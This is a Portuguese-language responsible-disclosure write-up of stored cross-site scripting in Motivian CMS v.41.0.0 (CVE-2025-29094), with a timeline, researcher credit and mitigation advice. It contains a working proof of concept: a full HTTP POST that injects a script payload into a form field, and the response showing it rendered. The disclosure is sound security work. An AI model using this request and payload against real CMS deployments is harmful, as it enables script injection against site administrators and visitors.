
Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.
Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.
Esta vulnerabilidade foi reportada ao fornecedor de acordo com as práticas de divulgação responsável, e à MITRE, que atribuiu um ID CVE temporário. Os detalhes estão sendo tornados públicos após o término do período de divulgação de 45 dias.
Marketing/Forms, Marketing/Offers, Content/PagesA vulnerabilidade de Cross-Site Scripting no Motivian Content Mangment System v.41.0.0 permite que um atacante remoto execute código arbitrário por meio dos componentes Marketing/Forms, Marketing/Offers e Content/Pages. A vulnerabilidade foi explorada ao injetar código JavaScript malicioso em vários campos, incluindo o título em Marketing/Form e Marketing/Offers, e o campo header script em Content/Pages
A vulnerabilidade pode ser explorada por meio de vários campos em diferentes componentes. Para fins de demonstração, a prova de conceito a seguir concentra-se em um cenário específico:
Marketing/Forms e crie um novo elemento de formulário.Abaixo está a transcrição completa das requisições e respostas HTTP usadas para demonstrar o problema:
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
Sanitize toda a entrada do usuário e aplique escape à saída antes de renderizar. Implemente o cabeçalho CSP (Content Security Policy) para mitigar riscos de XSS.
| Date | Action |
|---|---|
| 2025-02-06 | Solicitação de ID CVE (CNA: MITRE) |
| 2025-04-02 | Atribuição de ID CVE |
| 2025-04-07 | Vulnerabilidades reportadas ao fornecedor |
| 2025-05-31 | Divulgação pública após o término do período de divulgação de 45 dias (54 dias no total) |
| 2025-06-04 | Registro oficial e entrada no banco de dados da MITRE e no portal NIST/NVD |
Descoberta e divulgada de forma responsável por:
Francesco Marcuccio
Consultor de Cibersegurança, Penetration Tester
Atribuição do descobridor pela MITRE listada como:
Francesco Marcuccio
Consultor de Cibersegurança, Penetration Tester
Este ID CVE está oficialmente no status PUBLISHED. Ele será atualizado com a pontuação CVSS pela NIST, após análise.